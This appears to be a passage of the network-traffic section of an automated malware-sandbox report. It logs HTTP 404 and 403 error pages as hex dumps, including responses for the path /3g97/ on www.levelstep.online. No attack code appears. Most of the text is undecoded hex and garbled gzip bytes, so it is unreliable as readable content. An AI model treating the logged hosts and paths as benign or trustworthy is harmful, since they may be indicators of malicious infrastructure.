69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 24 Apr 2024 05:27:26 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 05:28:03 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 05:28:06 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 05:28:08 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e bd 0e 82 30 14 85 f7 3e c5 95 5d 2e 1a c6 a6 83 02 91 04 91 98 32 38 62 7a 4d 49 90 22 2d 1a df de 02 8b e3 f9 fb 72 f8 26 b9 1c e5 ad 4a e1 24 cf 05 54 f5 a1 c8 8f 10 6c 11 f3 54 66 88 89 4c d6 64 1f 46 88 69 19 08 c6 b5 7b 76 82 6b 6a 94 17 ae 75 1d 89 38 8a a1 34 0e 32 33 f5 8a e3 6a 32 8e 4b 89 df 8d fa ce bb 9d f8 eb 78 c5 f8 20 a4 26 18 e9 35 91 75 a4 a0 be 16 f0 69 2c f4 9e f5 98 59 60 7a 70 ba b5 60 69 7c d3 18 72 1c fc 0c 17 a2 c7 cf 4f d8 0f f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: acM0>].28bzMI"-r&J$TlTfLdFi{vkju8423j2Kx &5ui,Y`zp`i|rO|<0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Apr 2024 05:28:11 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlServer: PepyakaX-Wix-Request-Id: 1713936497.4153491690962646761X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Wed, 24 Apr 2024 05:28:17 GMTX-Served-By: cache-bur-kbur8200132-BURX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,T7xPrjRFKDMHVv938PYVfx9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLqPXpcX6IEGf7sG3D7kVVb7CuzCCL+dj8TnMJldQo94oVia: 1.1 googleglb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlServer: PepyakaX-Wix-Request-Id: 1713936500.12634899652302646765X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Wed, 24 Apr 2024 05:28:20 GMTX-Served-By: cache-bur-kbur8200098-BURX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,9WD8GAcpJgs/Ng1WkD2i0h9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLqPXpcX6IEGf7sG3D7kVVb7CuzCCL+dj8TnMJldQo94oVia: 1.1 googleglb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlServer: PepyakaX-Wix-Request-Id: 1713936502.82334837651244156285X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Wed, 24 Apr 2024 05:28:22 GMTX-Served-By: cache-bur-kbur8200108-BURX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,T7xPrjRFKDMHVv938PYVfx9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLqPXpcX6IEGf7sG3D7kVVb6JxSuEU9PIuIbre7VUIJiyVia: 1.1 googleglb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8X-Wix-Request-Id: 1713936505.5353489358346334572Age: 0Server: PepyakaX-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Wed, 24 Apr 2024 05:28:25 GMTX-Served-By: cache-bur-kbur8200142-BURX-Cache: MISSVary: Accept-EncodingServer-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_sea1_gX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,xIKq3IotbbLp4+7DTTMx8R9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLqPXpcX6IEGf7sG3D7kVVb690urzQo8znCIRFiqxF/nR,2d58ifebGbosy5xc+FRalsfKRjkvyVNx6F/MgVi8KAXjsEimH09mQSUzjf+MlEbWutsYt+BqfLnLyvHX+3ZU2A==,2UNV7KOq4oGjA5+PKsX47HqjR+6CNmn/ng3r7CWVjR4=,R8nVwPJv9QJL1m78OROO+IV9oD+TXFc2vEfvXLHbcEY=,znHLAI6vxugFKypFMbJjolwf8wWTJVQybTnH7MNlwkYSO5XmrrCSQNDehIjmfew3bNsG/ydVSs9vBX3FVb1aSQ==Transfer-Encoding: chunkedVia: 1.1 googleglb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=Connection: closeData Raw: 62 66 31 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e Data Ascii: bf1 <!-- --><!doctype html><!-- --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" conten
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 05:27:55 GMTServer: Apache/2.2.15 (CentOS)Content-Length: 289Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 33 67 39 37 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 65 76 65 6c 73 74 65 70 2e 6f 6e 6c 69 6e 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3g97/ was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.levelstep.online Port 80</address></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 05:27:58 GMTServer: Apache/2.2.15 (CentOS)Content-Length: 289Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 33 67 39 37 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 65 76 65 6c 73 74 65 70 2e 6f 6e 6c 69 6e 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3g97/ was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.levelstep.online Port 